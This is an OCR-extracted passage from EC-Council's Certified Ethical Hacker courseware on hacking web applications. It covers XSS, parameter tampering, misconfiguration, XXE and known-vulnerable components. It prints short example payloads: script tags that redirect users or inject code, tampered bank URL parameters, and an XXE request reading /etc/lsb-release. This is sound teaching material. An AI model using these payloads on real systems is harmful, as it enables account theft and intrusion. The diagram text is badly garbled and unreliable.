htilff'ICOUl'lttffl!Mlftl'OJ. ·O ....................................=
http://certifiedhacker.com/<script>
alert("WARNING: The application has
encountered an error") ;</script>

Figure 14.12: Demonstration of XSS attack

Note: Check the CEH Tools, Module 14: Hacking Web Applications, for the XSS cheat sheet.

Cross-Site Scripting Attack Scenario: Attack via Email

In a cross-site scripting attack that employs email, the attacker crafts an email that contains a
link to the malicious script and sends it to the victim, luring the victim into clicking the link
containing the malicious script/query. For example, if the attacker finds a cross-site scripting
vulnerability on the bank.com website, he/she constructs a link embedded with a malicious
script such as
<AHREF=http://bank.com/registration.cgi?clientprofile=<SCRIPT>rnaliciouscode</
SCRIPT>>Click here</A>

and sends an email to the target user. When the user clicks the link, the URL is sent to
bank.com with the malicious code. The legitimate server hosting the bank.com website sends a
page back to the user including the value of clientprofile, and the malicious code is executed on
the client machine. The malicious code asks the victim to enter profile information . After the
user enters all the necessary personal details and clicks Submit, the attacker receives the

Module 14 Page 1921 Ethical Hacking and Counte rmeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

information. The attacker can use these details to impersonate the user to gain access to the
user's on line bank account and perform other fraudulent activities.
@iaI•Jlhw;/ffu.C..tg ! bl
User clicks
··············=>~ :... Hi, You have won a

.................... , -""•· · · ···· ·· ···➔ ~~:~i~ko: s,~: nc:~~k

'51-
0
;r.,J
I
the malicious link

HREfzhttp://b•nk.com/
Sends email with Internet
User
malicious link
: Attacker harvests these
: credentials and get s access
: to victim's bank account
V
Client Profile
Name:
Ac•:
User enters profile Locatton:
information and Occupation:
Bank UMr ID: Request is received by
clicks Submit User Password: server hosting bank.com

Figure 14.13: XSS attack via email

XSS Example: Attack via Email

Attacker
H Server

Legitimate

l.
User's Malicious Attacker's
Server
Browser Sc~ipt Server

0
I

Construct a malicioys link

I
<A IIREF=http://Juggyboybank . com/
registration.cgi?clientprofile=<SCRIPT>
malicious code</SCRIPT>>Click h e re</A>
=)
::·· a ..... (1·· ··········>:
I I

I
Email he URL to user and convince user to click on it
:
I

, I
:
I
: Request the pag~
I

:,·· O ....... ···········~············ ··············~············ ············:>

,
I
I

..a..
I
I I I

:
:~·········
I
............:,. ...........................
I
Page wit~ malicious script
1••·········· ········O ·,: I I
I I
I I
1 Run ,
:••11.'11 •••••••••••••••••• :>:
I ~ I

Figure 14.14: XSS example - attack via email

Module 14 Page 1922 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

XSS Example: Stealing Users' Cookies

Attacker
I~~~~·;,;1 IHI ~
Server

....................... ....................... ....................... Legitimate

User's Malicious Attacker's
Server
Browser Script Server
I I

: ( I --

a Constr ct a malicio~s link

I

1
< A HREF=http: //Juggyboybank.com/
registration. cgi ?clientprofile=<SCRIPT>
malicious code</SCRIPT>>Cliclc here</A>
I
I
I I I .._. I

: ~ Em ii the URL t ~ user and convince use r to click on it

:··~ ····· .. ··········>:
: : Request the pag~
I : , ,
I : •• • ■ ••• ■ ■■■ ••• ■■ •• ■ ••• ~ ••• ■ •••••••• ■■■■■■ ■ ••• ■ ■ ■■ ~ ■ ••• ■ ■■ ■ ■ •• •••• ■ •••• •••• ■~
I I I I

!~········· ·T···········~················~~~~.~~~~.~.~1.i~!~~:.~li~~-D .; 1

: Run l :
:•• 1'S. •••••••••••••••••• ~ :
I ~ I
I I
' '

Figure 14.15: XSS example - Stealing users' cookies

XSS Example: Sending an Unauthorized Request

Attacker
I~~~~;,·;1 IHI ~
Server

• • • ■ ■ •••••••••••••••• ■• ....................... ....................... Legitimate

User's Malicious Attacker's
Server
Browser Script Server

0
I

Construct a maliciops link

iI.•ft_'.'.'.'.~'.'.\~.~•~-~'..~u,e""d ,. Ivince user to click it O

v- I I

i ..A ..~~~.~~.~~~~~.~.~!~ ............ ....................... . ·············►

I

I
i1-V I I I
I

: ! I :
,-<E············ ··········••f••········· ············r··········· ~
.~i~~·O ·i
Page with ~ alicious
I
I I
I

!••8 ••~~•~•• •••••••••~: I

:
v .. ~~ ~.~~~?~!~~.~.~F-~~.~~~.... ............ ~
,~.A I

Figure 14.16: XSS example - Sending an unauthorized request

Module 14 Page 1923 Ethical Hacking and Countermeasures Copyright © by EC•Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

XSS Attack in Blog Posting

The attacker finds an XSS vulnerability in the techpost.org website, constructs a malicious script
<script>onload=window.location='http://www.certifiedhacker.com'</script>, and adds it in
the comment field of TechPost. This malicious script posted by the attacker is stored on the
web application database server and runs in the background. When a user visits the TechPost
website, the malicious script injected by the attacker in the TechPost comment field activates
and redirects the user to the malicious website certifiedhacker.com.

◄ ► ft 'O ~ r r

~ Uservisitsthe
TechPost website
Facebook acquires file-sharing service
•·· · ············ ·►
New York.based start-up that lets users privately New Yo,k-based start-up that lets users privately
and sporadically share files through a drag-and• and sporadiul ly share files lhrough a drag-.and-
Attacker drop interface with additional options. User drop inl erface with :addition:al opl ions..•

leave you r comment leave your comme nt

Injects
Jason, I love your blog post I
<scrfpt>onloadzwlndow.lOQtlona'http:// malicious code
www.certlfledhacker.com'</scrlpt> <scr ipt >onload=
w indow.locatio n=
'http://www.certifie
Attacker adds a malicious
dhacker.com'
script in the comment field
of bias post
</script>
in t he blog post

Comment with malicious --

'it ··· · ··· · ······ ······ · ·►
User redirected to a
malicious website
~ ■
._ <:...........................
link is stored on the serve r
• certified hacker.com

Database Server Web Application Malicious Website

Figure 14.17: XSS attack in a blog posting

Module 14 Page 1924 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

XSS Attack in Comment Field

http://www.te.chpost.org/ h np'//www.techposu,rg/

lnbPo,1
• •• • • Jason l 29Oct,2017
~
~
User visits the
TechPost website
lt·chPo,l
• ·- • • · Jasonl290ct, 2017

Facebo o k acq uires file-sharing service ···············l> Face book acquires file-shari ng service
New Vorlt-based start-up that lets users privately
New York-based start-up that lets users privatety
and sporadically share files through a drag-and-
and sporadically share files through a drag-and-
Attacker User drop Interface with additiOnal optiOns........
drop interface with additional options.....
Co m m e n t
Jason, I love your blog post!
Leave your com ment
• Mark (mark@miCcasoft. com)
Jason, I love your blog post ! l eave yo ur comment
Inje cts
<script>aler t ("Hello
World") </script>
malicious code
< s cript>a.le
rt( " Hello
Attacker adds a malicious World" ) </ sc
script in the comment field ript>
of blog post in the blog post

Comment with malicious

v
...... ·····················:>I
The alert pops up as
... link is stored on the server ■
- <! ......................... . soon as t he web page
is loaded .___ _ _ _ _ _ _ ___,
Malicio us Websit e
Database Server Web Application

Copynght Cl by EC-Ctuncil All Rights Reseived Reproduction is Strictly Prohibited

XSS Attack in Comment Field

Many web applications use HTML pages that dynamically accept data from different sources.
One can change the data in the HTML pages according to the request. Attackers use HTML web
page tags to manipulate data. They launch an attack by changing the comments feature using a
malicious script. When the target sees the comment and activates it, then the target browser
executes the malicious script to accomplish the attacker's goals.
For example, an attacker finds a vulnerable comment field in the TechPost.org website. Thus,
he constructs the malicious script "<script>alert ("Hello World") </script>" and adds it along
with his comment in the comment field of TechPost . This malicious script, along with the
comment posted by the attacker in the comment field, is stored on the web application' s
database server. When a user visits the TechPost website, the coded message " Hello World"
pops up whenever the web page is loaded. Therefore, when the user clicks OK in the pop-up
window, the attacker can gain access to the user's browser and subsequently perform malicious
activities.

Module 14 Page 1925 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

http:// - .1echpost.ors/ httrli- .techpost,Of

kchPo-.1 User visits the kc-hPo,t

• •• · • J1sonl290c1,2017 TechPost website • • • • • Ju.on I 29 Oct, 2017

Facebook acquires f ile-sharing service ················>- Facebook acquires file-sharing service

New York-b.ued st.1rt-up th.11 let5 users privately
New York-based start-up that lets users privately
and sporadiully share files through a drag-and-
Attacker and sporadically share files through a drag-and-
User drop interf-ace with .ldditional opUons
drop interface with additional options.•••..
Comment
Jason, I love your blos post!
Leave your comment
- Mark (mark @lmkcasoft.com)
Jason , I l o ve your blog poa t! Injects l eave your comment
<scr i pt>.a.lert ( " Hello
World" ) </acript>
malicious code
<s cript>al@
rt ( " Hello
Attacker adds a malicious World")</sc
script in the comment field ript>
o f blog post in the blog post

...;;,~·;,~~ ;,;;;;~~·;;..·► 1
soon as the web page
is loaded .__ _ _ _ _ _ _ _ _ _ _ __.

Malicious Website

Figure 14.18: XSS Attack in the comment field

Module 14 Page 1926 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

A04 - Insecure Design

Insecure design flaws arise in an application because of the improper implementation of security controls
and can lead to crucial vulnerabilities such as SQLi and Open 53 buckets

Attackers initiate the threat modelling of an application's working process to identify a wide range of flaws
and loopholes before exploiting the insecure design or architecture

···············► @ ··················• ~

User content
•• ◄--······--··-- 8 @ ◄········--·--·--· §
Database

Attacker

r- Copynght CJ by iC-C1uncil All Rights Reserved Reproduction IS Stnctly Proh1b1ted

A04 - Insecure Design

Insecure design flaws arise in an application because of the improper implementation of
security controls and can lead to crucial vulnerabilities such as SQLi and Open S3 buckets.
Application designers may overlook security threats or have mediocre knowledge about them;
this is a major cause of these vulnerabilities. Such vulnerabilities can directly compromise the
application's security. The next most important factor that leads to these insecurities in design
is the absence of business risk profiling. Attackers initiate the threat modeling of an
application's working process to identify a wide range of flaws and loopholes before exploiting
an insecure design or architecture.
The following are some exploitations that can be performed by software and data integrity
failures:
■ Request forgery
■ Authentication hijacking
■ Identity theft
■ Data loss
■ Dos attacks
Example
Attackers often attempt to exploit poorly implemented APl s, which fail to filter requests
properly. They search for weak APls that are not integrated with security gateways to
differentiate malicious inputs. Then, they attach malicious code to a vulnerable API. When a
user accesses that API via an application, the malicious code loads along with the database
content on the user's browser.

Module 14 Page 1927 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Accesses API

.. & ... ~~:?.~!~.~~.~~~.1:~~~i~~ ... • ................ . . .................... ~

◄ ... ~~ii~i~~; ~~ei~·1~·~ei~;; .. 8 ·.· •••
• • ··········.... •• ◄· ................. §
- along with database
User content Application A! I Database
:........ ................... ;
A : Searches for a poorly
implementedAPI to
,u.m malldo,s ood,

0Attacker

Figure 14.19: Insecure design attack

Module 14 Page 1928 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibit ed.
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

A05 - Security Misconfiguration

By exploit ing misconf iguration vulnerabilit ies such as unvalidated inputs, para meter/ form tampering, improper error handling, and
insuffi ci ent transport layer protect ion, attackers gain unauthorized access to defau lt accounts, read unused pages, read/write
unprotected fi les and directories, etc.

Sec urity misconfig uration can occur at any level of an application stack, incl uding t he platform, web server, application server,
framework, and custom code

Unvalidated It refers to a web application vulnerability in which the input from a client is not validated before being
01 Inputs processed by web applicati ons and backend serve rs

Parameter/Form It involves t he manipulation of parameters exchanged between the cl ient and server to modify
02 Tampering application data

It provides insight into source code such as logic flaws and defau lt accounts. Using the information
lntproper Error
03 Handling
received from an error message, an attacker identifies vulnerabilities to launch various web applicat ion
attacks
Insufficient
It supports weak algorithms and uses expired or invalid certifi cates. Using insufficient t ransport layer
04 Transport
Layer Protection
protection exposes user data to untrusted t hird parties and can lead to account theft

lntproper It discloses internal files using t he file URI handler, internal 5MB file shares on unpatched Windows
05 Restriction ofXXE serve rs, internal port scanning, remote code execution, and Dos attacks

Copynght Cl by EC-Ctuncil All Rights Reseived Reproduction is Strictly Prohibited

AOS - Security Misconfiguration

Developers and network administrators should ensure that an entire application stack is
configured properly; otherwise, security misconfiguration can occur at any level of the stack,
including its platform, web server, application server, framework, and custom code. For
instance, if the developer does not configure the server properly, it could result in various
problems that can affect the site security. Problems that lead to such instances include
unvalidated inputs, parameter/form tampering, improper error handling, insufficient transport
layer protection, etc.
• Unvalidated Inputs

Input validation flaws refer to a web application vulnerability whereby input from a
client is not validated before being processed by web applications and backend servers.
No validation or improper validation can make a web application vulnerable to various
input validation attacks. If web applications implement input validation only on the
client side, attackers can easily bypass it by tampering with the HTTP requests, URLs,
headers, form fields, hidden fields, and query strings. Users' login IDs and other related
data are stored in the cookies, which become a means of attack. An attacker exploits
input validation flaws to perform cross-site scripting, buffer overflow, injection attacks,
etc., resulting in data theft and system malfunction.

Module 14 Page 1929 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

string sql ="select* from Users

http://www.cert1f1edhack
where
er.com/login.aspx?user=J •····➔ user = + User. Text + "
1 11 1

asons@pass=springfield
and pwd:;;;;'" +Password.Text+ "'\\r

Browser Post Request Modifi~d Query

<····················;
Browser input not
validated by the web
application
Database

Figure 14.20: Unvalidated Input attack

• Parameter/Form Tampering

A web parameter tampering attack involves the manipulation of parameters exchanged

between the client and the server to modify application data such as user credentials
and permissions, prices, and quantities of products. This information is actually stored in
cookies, hidden form fields, or URL query strings. The web application uses it to increase
its functionality and control. A man-in-the-middle (MITM) attack is an example of this
type of attack. Attackers use tools such as WebScarab and WebSploit Framework for
these attacks.
Parameter tampering is a simple type of attack aimed directly at an application's
business logic. It takes advantage of the fact that many programmers rely on hidden or
fixed fields (such as a hidden tag in a form or a parameter in a URL) as the only security
measure for certain operations. To bypass this security mechanism, an attacker can
change these parameters. A parameter tampering attack exploits vulnerabilities in
integrity and logic validation mechanisms that may result in XSS, SQL injection, etc.
Detailed Description:

After a session is established between the web application and the user, an exchange of
parameters between the web browser and the web application takes place to maintain
information about a client's session, which eliminates the need to maintain a complex
database on the server side. A web application uses URL queries, form fields, and
cookies to pass these parameters.
Changing parameters in the form field is the best example of parameter tampering.
When a user selects an HTML page, it is stored as a form field value and transferred as
an HTTP page to the web application. These values may be pre-selected (combo box,
checkbox, radio buttons, etc.), free text, or hidden. An attacker can manipulate these
values. In some extreme cases, the attack involves saving the page, editing the HTML,
and reloading the page in the web browser.
Hidden fields that are invisible to the end user provide information status to the web
application. For example, consider a product order form that includes the following
hidden field :
<input type="hidden" name="price" value="99.90">

Module 14 Page 1930 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

Combo boxes, check boxes, and radio buttons are examples of pre-selected parameters
used to transfer information between different pages while allowing the user to select
one of several predefined values. In a parameter tampering attack, an attacker may
manipulate these values.
For example, consider a form that includes the following combo box:
<FORM METHOD=POST ACTION="xferMoney . asp">
Source Account: <SELECT NAME="SrcAcc">
<OPTION VALUE="123456789">******789</OPTION>
<OPTION VALUE="868686868">******868</OPTION></SELECT>
<BR>Arnount: <INPUT NAME="Arnount" SIZE=20>
<BR>Destination Account: <INPUT NAME="DestAcc" SIZE=40>
<BR><INPUT TYPE=SUBMIT><INPUT TYPE=RESET>
</FORM>

Bypassing:
An attacker may bypass the need to choose between two accounts by adding another
account in the HTML page source code. The web browser displays the new combo box,
and the attacker can choose the new account.
HTML forms submit their results using one of two methods: GET or POST. In the GET
method, all form parameters and their values appear in the query string of the next URL,
which the user sees. An attacker may tamper with this query string. For example,
consider a web page that allows an authenticated user to select one of his or her
accounts from a combo box and debit the account with a fixed unit amount. When the
user clicks on a submit button in the web browser, the URL request is as follows:
http://www . certifiedhackerbank . com/cust.asp?profi1e=21&debit=2500

The attacker may change the URL parameters (profile and debit) to debit another
account:
http://www.certifiedhackerbank.com/cust . asp?profi1e=82&debit=1500

The attacker can modify other URL parameters, including attribute parameters and
internal modules. Attribute parameters are unique parameters that characterize the
behavior of the uploading page. For example, consider a content-sharing web
application that enables the content creator to modify the content, while other users
can only view the content. The web server checks wheth er th e user who is accessing an
entry is the author or not (usually via cookies) . An ordinary user will request the
following link:
http://www.certifiedhackerbank . com/stat.asp?pg=531&status=view

The attacker can modify the status parameter to " delete" to delete permission for the
content.
http://www . certifiedhackerbank . com/stat . asp?pg=147&status =delete

Module 14 Page 1931 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Parameter/form tampering can lead to theft of services, escalation of access, session

hijacking, and assuming the identity of other users, as well as parameters that grant
access to the developer and debugging information.

......... Tampering with the

URL parameters

. .
http://www.certifiedhackerbank.com/cust.asp ?profile=82&debit=1500 ~•••••
·······-······················

Other parameters can

......... be changed including
attribute parameters

[ http://www.certifiedhackerbank.com/stat.asp?pg=147&status=delete ~- ·• • •

Figure 14.21: Parameter Tampering attack example

■ Improper Error Handling

It is necessary to define how a system or network should behave when an error occurs.
Otherwise, the error may provide a chance for an attacker to break into the system.
Improper error handling may lead to Dos attacks.
Improper error handling provides insights into the source code, such as logic flaws and
default accounts, which the attacker can exploit. Using the information received from an
error message, an attacker identifies vulnerabilities for launching various web
application attacks. Improper exception handling occurs when web appl ications do not
limit the amount of information they return to their users. Information leakage may
include helpful error messages and service banners. Developers and system
administrators often forget or disregard how an attacker can use something as simple as
a server banner. The attacker will start searching for a place to identify vulnerabilities
and attempt to leverage information that applications freely volunteer.

Module 14 Page 1932 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved . Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

General Error

Could not obt ain post/user information

DEBUG MODE
SQL Error: 1016 Can't open file: 'nuke_bbpost s_text.MYD'. (errno: 145)
SELECT u.username, u.user_id, u.user_posts, u.user_from, u.user_websit e, u.user_email,
u.user_msnm, u.user_viewemail, u.user_rank, u.user_sig, u.user_sig_bbcode_uid,
u.user_allowsmile, p.•, pt.post_text, pt.post_subject, pt.bbcode_uid FROM nuke_bbposts p,
nuke_users u, nuke_bbpost s_text pt WHERE p.topic_id = '1547' AND pt.post_id = p.post_id
AND u.user_id= p.poster_id ORDER BY
p.post_time ASC LIMIT 0, 15
Line: 435
File:/user/home/geeks/www/vonage/modules/Forums/viewtopic.php

Figure 14.22: Screenshot displaying improper errors

The attacker can gather the following information from improper error handling:
o Null pointer exceptions
o System call failure
o Database unavailable
o Network timeout
o Database information
o Web application logical flow
o Application environment
■ Insufficient Transport Layer Protection

Insufficient transport layer protection is a security flaw that occurs when an application
fails to protect sensitive traffic flowing in a network. It supports weak algorithms and
uses expired or invalid certificates. Developers should use SSL/TLS authentication for
authentication on the websites; otherwise, an attacker can monitor the network traffic.
Unless communication between websites and clients is encrypted, data can be
intercepted, injected, or redirected. An underprivileged SSL setup can also help the
attacker to launch phishing and MITM attacks.
System compromise may lead to various other threats such as account theft, phishing
attacks, and compromised admin accounts. Thus, insufficient transport layer protection
may allow untrusted third parties to obtain unauthorized access to sensitive

Module 14 Page 1933 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Cert ified Et hical Hacker
Hacking Web Applications

information. All this occurs when applications support weak algorithms used for SSL and
when they use expired or invalid SSL certificates or do not use them correctly.
Example

Assume that a user logs into an online banking application that possesses insufficient
transport layer protection (i.e., it is not SSL encrypted). The sensitive data in the
communication (e.g., session ID) can be vulnerable to attack during transit in plaintext
format. This allows an attacker to steal such data to perform various types of attacks on
the application.
■ Improper Restriction of XML External Entity (XXE)

Many older or poorly configured XML processors evaluate external entity references
within XML documents. External entities can disclose internal files using the file URI
handler, internal SMB file shares on unpatched Windows servers, internal port scanning,
remote code execution, and DoS attacks such as the billion laughs attack.
Some server configuration problems are as follows:
■ Missing security hardening
■ Server software flaws
■ Enabling unnecessary services
■ Improper authentication
■ Unpatched security flaws
■ Server configuration problems
■ Default accounts with default credentials
■ Legacy software
Automated scanners help to detect a few of these problems. Attackers can access default
accounts, unused pages, unpatched flaws, unprotected files and directories, and so on to gain
unauthorized access. The person responsible should t ake care of all such unnecessary and
unsafe features. Disabling them completely would prove to be highly beneficial, preventing
outsiders from using them for malicious attacks. To avoid leakage of crucial information to
attackers, the network administrator should thus take care of all application-based files through
proper authentication and strong security methods. For example, if the application server
admin console is automatically inst alled and not removed, and the default accounts are not
changed, then the attacker discovers the standard admin pages on the server, logs in with
default passwords, and establishes control over the server.

Module 14 Page 1934 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved . Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

XML External Entity (XXE)

XML External Entity attack is a server-side request forgery (SSRF) attack that can occur when a misconfigured XML parser
allows applications to parse XML input from an unreliable source

Attackers can a refer a victim's web application to an external entity by including the reference in the malicious XML input

When this malicious input is processed by the weakly configured XML parser of a target web application, it enables the
attacker to access protected files and services from servers or connected networks

Mallcloua Req- o(••···························:

:• ···•·• · ········ · ··· · ·• ···► POST http: //cartifi.adhackar.com/xm.l
; H'l'TP/1.1
< ' DOCTYPE f oo [
00 - -<•l'lil • dhac:l,u.tom

< !ELEMENT f oo ANY>

< !ENTITY bar SYSTEM
" file: // /etc/lsb-ral ease">
)>
<foo>
, bar; </foo>

Attacker Reapow:
t HTTP/1.0 200 Olt

DISTRIB_J:D• Ubuntu
:............................. . DISTRIB R.ELEASE-18 . 0 4

~~=:~==~:=;~::~~untu 18 . 04 LTS " -4:·····························~Web application with weakty

Configured XML Parser

Copynght Cl by EC-Ctuncil All Rights Reseived Reproduction is Strictly Prohibited

XML External Entity (XXE)

An XML External Entity attack is a Server-side Request Forgery (SSRF) attack whereby an
application can parse XML input from an unreliable source because of the misconfigured XML
parser. In this attack, an attacker sends a malicious XML input containing a reference to an
external entity to the victim's web application. When this malicious input is processed by a
weakly configured XML parser of the target web application, it enables the attacker to access
protected files and services from servers or connected networks.
Since XML features are widely available, the attacker abuses these features to create
documents or files dynamically at the time of processing. Attackers tend to make the most of
this attack, as it allows them to retrieve confidential data, perform Dos attacks, and obtain
sensitive information via HTTP(S); in some worst-case scenarios, they may even be able to
perform remote code execution or launch a CSRF attack on any vulnerable service.
According to the XML 1.0 standard, XML uses entities often defined as storage units. Entities
are special features of XML that can access local or remote contents, and they are defined
anywhere in a system via system identifiers. The entities need not be part of an XML document,
as they can come from an external system as well. The system identifiers that act as a URI are
used by the XML processor while processing the entity. The XML parsing process replaces these
entities with their actual data, and here, the attacker exploits this vulnerability by forcing the
XML parser to access the file or the contents specified by him/her. This attack may be more
dangerous as a trusted application; processing of XML documents can be abused by the
attacker to pivot the internal system to acquire all sorts of internal data of the system.
For example, the attacker sends the following code to extract the system data from the
vulnerable target.

Module 14 Page 1935 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Malicious Request: <···························:

:························i> POST http://certifiedhacker.com/xml
HTTP/ 1 . l
< ! OOCTYPE foo [ 00 www.certifiedlucker.com

< !ELEMENT foo ANY >

< !ENTITY bar SYSTEM
"fil e :///etc/lsb-release">
]>
<foo>
&bar; </foo >

Attacker Response: User

~ HTTP/1. 0 200 OK

DISTRIB_ID=Ubuntu
DISTRm_RELEASE=lS . 0 4
DISTRIB_ CODENAME=xenial
DISTRIB DESCRIPTION= " Ubuntu 18 . 0 4 LTS " <···························: Web application with weakly
Configured XML Parser

Figure 14.23: XML External Entity (XXE) attack

Module 14 Page 1936 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

A06 - Vulnerable and Outdated Components/Using

Components with Known Vulnerabilities
- _,k-- EXPLOIT
Most web applications that use components such as ""il'ATABA SE
libraries and frameworks always execute them with full
privileges, and flaws in any component can result in Mitl#Ml@f 11
serious impact
St.«:11 I web applica11011 I

Attackers can identify weak components or

dependencies by scanning orby performing manual 2021--01--06 ! x
RtsumesM~endJotl ~oonweosne 1 o
RCE(Unauthenbcated)
analysis )( =M.=andJob~abonWebsnelO
202HlHl5 ! WebApps PHP KshitllR.aj

Attackers search for any vulnerabilities on exploit sites 2010.1 2~ !

such as Exploit Database (https://www.exploit-db.com), 2011H)6.()5 ! ✓

IBMW~eApplcabonSffttf - Nfiworlr.~
Uni.rusted oat• Destf1al1Zet1on Remote COde El«lltlOII Remote w,nc1ows
and CXSecurity (https://cxsecurity.com) (Metasploit)

0r~leAppll!;ationle1'Ung$ute - Weblogic:$ef'l'er
2019-05'-29 !
AdmwstmtonCOM06e Wfl ~ (Mfflosplo,{)

If a vulnerable component is identified, the attacker X =BTof~MIChineSystemAppka\lOrl 1 0 - SQL WebApps

2019-01-1.f !
customizes the exploit as required and execute the
attack 2016-07-29 !. )( ====:~:;Metasplon) Reoole LRIX
201al-08-0,,I ! ✓ 8arraocudaWebAppl,cati0nF1tewtll-Aut/lenlica\lOn8ypliss Remote Hlf~e Niekttayn

Successful exploitation allows the attacker to cause 201, --09--01 !

NechnlWebAppllcationSClnnefWebUI · f>erl!Sl:tn!CfOSS·

serious data loss or take full control of the servers """""'"'

8arfKW11WtbA?l)llc;'1f0!1FlfCWall660• '/cgHnOd/lflOt•t11'
20@-12-19 !
MIA\Jplet-rTMLtn;eclklnV\.llnef~JtlU

https://www.exploit-db.com

Copynght Cl by EC-Ctuncil All Rights Reseived Reproduction is Strictly Prohibited

A06 - Vulnerable and Outdated Components/Using Components with Known

Vulnerabilities
Components such as libraries and frameworks that are used in most web applications always
execute with full privileges, and flaws in any component can have severe consequences.
Attackers can identify weak components or dependencies by scanning or by performing manual
analysis. Attackers search for any vulnerabilities on exploit sites such as Exploit Database
(https://www.exploit-db.com), CXSecurity (https://cxsecurity.com), and Zero Day Initiative
(https://www.zerodayinitiative.com). If a vulnerable component is identified, the attacker
customizes the exploit as required and executes the attack. Successful exploitation allows the
attacker to cause serious data loss or take over control of the servers. An attacker generally
uses exploit sites to identify the web application exploits or performs vulnerability scanning
using tools such as Nessus and GFI LanGuard to identify the existing vulnerable components.

• II I
I I I
Attacker takeover I I I
....................
control of Servers
·►
I
I
I
I
I
I

Attacker
■l ■l ■I
_1 _1 __,

Web Servers

Web application with known

vulnerable components

Figure 14.24: Attack on a web application with known vulnerable components

Module 14 Page 1937 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Verified Has App T Filters V. Reset All

Show 15 Search: web applicat ion I

J2te D ,~' V L-e - ype Pl2:'0'M .;u:(iO,.
Resumes Management and Job Application Website 1.0 -
2021-01-06 .! X
RCE (Unauthenticated)
WebApps PHP Arnav Tnpathy

Resumes Management and Job Application Website 1.0 -

2021-01-05 .! X
Authentication Bypass
WebApps PHP Kshltiz Raj

Yachtcontrol Webapphcat1on 1.0 - unauthenticated Remote

2019-12-09 .! X
Code Execution
WebApps Hardware Hodorsec

IBM Websphere Application Server - Network Deployment

2019-06-05 .! ✓ Untrusted Data Deseriahzation Remote Code Execution Remote Windows Metasplolt
(Metasploit)

oracle Application Testing Suite - Weblogic server

2019-05-29 .! Administration Console War Deployment (Metasploit)
Remote Java Metasplolt

Twilio WEB To Fax Machine System Application 1.0 - SOL

2019-01-14 .! X
Injection
WebApps PHP lhsan Sencan

Barracuda Web Application Firewall 8.0,1 008 -

2016-07-29 .! X
(Authenticated) Remote Command Execution (Metasploit)
Remote Linux xort

2014-08-04 .! ✓ Barracuda Web Application Firewall - Authentication Bypass Remote Hardware Nick Hayes

Arachni Web Application Scanner Web UI - Persistent Cross-

2014-09-01 .! Site Scripting
WebApps Multiple Prakhar Prasad

Barracuda Web Application Firewall 660 - '/cgi-mod/ index.cgi'

2009-12-19 .! ✓
Multiple HTM L lnJection Vulnerabilities
Remote Hardware Global-Evolution

Figure 14,25: Screensh ot dis playing Explo it D a t abase se arch results for web application exploits

The following are some of the conditions that make applications vulnerable:
■ When all the components' versions from both the server and client sides remain
unknown. This can include nested dependencies as well as components that are being
used directly.
■ When software such as the OSes, database/web/application servers, runtime
environments, and ot her components are unsupportable, obsolete, or unpatched.
■ When the regular vulnerability scanning process is neglected and not subscribed to the
security updates associated with the components being used.
■ When the primary framework, platform, and dependencies do not receive timely
updates.
■ When the compatibility of software updates or patches is not properly validated or
checked.
■ When proper security is implemented for the configuration files of the components.

Module 14 Page 1938 Ethical Hacking and Counte rmeasures Copyright © by EC-Council
